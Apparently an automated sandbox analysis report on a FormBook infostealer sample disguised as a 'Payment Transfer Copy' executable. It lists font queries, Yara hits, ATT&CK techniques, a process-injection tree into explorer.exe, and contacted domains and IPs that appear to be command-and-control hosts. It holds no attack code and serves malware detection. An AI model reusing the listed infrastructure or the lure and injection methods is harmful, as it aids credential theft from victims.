          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          (Numbers attached to a technique name are the report's signature-count badges for that technique; cells are separated by "|", one tactic column per cell.)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | Input Capture1 | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | -
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information41 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | -
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | -

          Behavior Graph

          Behavior Graph ID: 356535
          Sample: Payment Transfer Copy of $2...
          Startdate: 23/02/2021
          Architecture: WINDOWS
          Score: 100
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

          Process tree (as drawn in the graph):
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (started)
            Dropped file: Payment Transfer C...e shipments.exe.log, ASCII
            Signature: Injects a PE file into a foreign processes
            -> Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (started)
                 Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                 -> explorer.exe (injected)
                      DNS/IP info: jaemagreci.com 50.116.112.43, 49736, 80, UNIFIEDLAYER-AS-1US, United States; olgadalila.com 198.27.88.111, 49753, 80, OVHFR, Canada; 17 other IPs or domains
                      Signature: System process connects to network (likely due to code injection or exploit)
                      -> explorer.exe (started)
                           Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           -> cmd.exe (started)
                                -> conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 25% | Virustotal | -
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2b80000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          9.2.explorer.exe.330000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal | -
          www.zomapa.com | 0% | Virustotal | -

          URLs


          Domains and IPs

          Contacted Domains


                                      Contacted URLs


                                      URLs from Memory and Binaries

                                                    http://www.carbeloy.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sakkal.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carbeloy.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kathrynbaierling.com/blr/www.na230.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.jasa-software.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.olgadalila.com/blr/www.zomapa.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/www.gannahealing.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.stanchilo.com/blr/www.yoshiyama-potager.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.jaemagreci.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.carbeloy.com/blr/www.prodhealth.siteexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.kanaai.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.long9000.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.olgadalila.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jaemagreci.com/blr/www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
